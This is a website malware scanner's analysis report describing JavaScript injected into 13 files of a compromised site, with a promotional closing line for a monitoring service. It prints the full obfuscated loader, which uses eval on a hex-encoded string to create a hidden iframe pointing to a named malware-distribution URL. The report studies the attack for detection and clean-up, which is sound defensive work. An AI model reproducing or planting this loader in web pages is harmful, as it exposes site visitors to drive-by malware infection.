Website uses JavaScript libraries which are located on remote hacked server and containing JS exploit

Website uses JavaScript libraries containing JS exploit and located on remote hacked server 

Background

Online Website Malware Scanner has identified malicious JavaScript libraries on the scanned website. It looks like the remote and now blacklisted www.omatanet.net was hacked and infected with exploits so that later to be used as intermediate server for malware distribution.

These libraries are injecting hidden  iframe connecting visitor to malware distributor. This infected website hosts suspicious JavaScript code injected in 13 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon May 13 17:21:26 2013

Infected website's files: 13

Website malware scan report link: http://goo.gl/uuqlS

Quttera | Website Malware Scanner

JavaScript exploit detected in 13 files

Malware entry

Malware entry details.

Beautified script

1. e = eval;
2. v = "0" + "x";
3. a = 0;
4. try {
5.     a *= 2
6. } catch (q) {
7.     a = 1
8. }
9. if (!a) {
10.     try {
11.         document["\x62od" + "y"]++
12.     } catch (q) {
13.         a2 = "_"
14.     }
15.     z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_6e_7e_69_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_27_27_27_6e_7e_69_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_80_6b_6f_7c_74_6a_6c_7e_35_79_7c_36_6a_76_7c_75_7b_39_37_35_77_6f_77_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_27_27_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6e_7e_69_2e_30_30_27_82_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_6e_7e_69_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6e_7e_69_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6e_7e_69_30_42_14_11_27_27_27_27_84_14_11_84_30_2f_30_42"["split"](a2);
16.     za = "";
17.     for (i = 0; i < z.length; i++) {
18.         za += String["fromCharCode"](e(v + (z[i])) - 5 - 2);
19.     }
20.     zaz = za;
21.     e(zaz);
22. }

Malicious payload

Decoded payload generates hidden iframe to http://ydhumcew.ru/count20.php

Blacklisting status

The website is Suspicious on Google Safe Browsing.

Google Safe Browsing analysis

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.